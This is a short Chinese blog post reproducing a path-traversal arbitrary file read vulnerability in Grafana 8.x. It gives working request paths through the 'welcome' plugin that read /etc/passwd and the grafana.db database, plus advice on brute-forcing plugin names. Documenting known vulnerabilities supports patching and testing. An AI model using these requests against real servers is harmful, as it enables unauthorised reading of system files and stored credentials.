Grafana 任意文件读取漏洞复现

zhangchen 好物分享

一、漏洞描述
Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件
二、漏洞影响
Grafana 8.x
三、漏洞复现
可以从登陆页面看到版本信息为 v8.2.4,此版本在漏洞射程范围之内
查看当前所使用的插件:
/api/plugins?embedded=0
http://10.10.12.120:443/api/plugins?embedded=0

读取 /etc/passwd文件
POC: /public/plugins/welcome/../../../../../../../../../etc/passwd

读取 db 文件
POC: /public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db
 
四、探测插件
因为环境的不同可能存在的插件也就不同
4.1 字典爆破
可以直接去官网爬取字典:https://grafana.com/grafana/plugins/

Grafana 任意文件读取漏洞复现最先出现在Python成神之路

版权声明:
作者:zhangchen
链接:https://www.techfm.club/p/25232.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>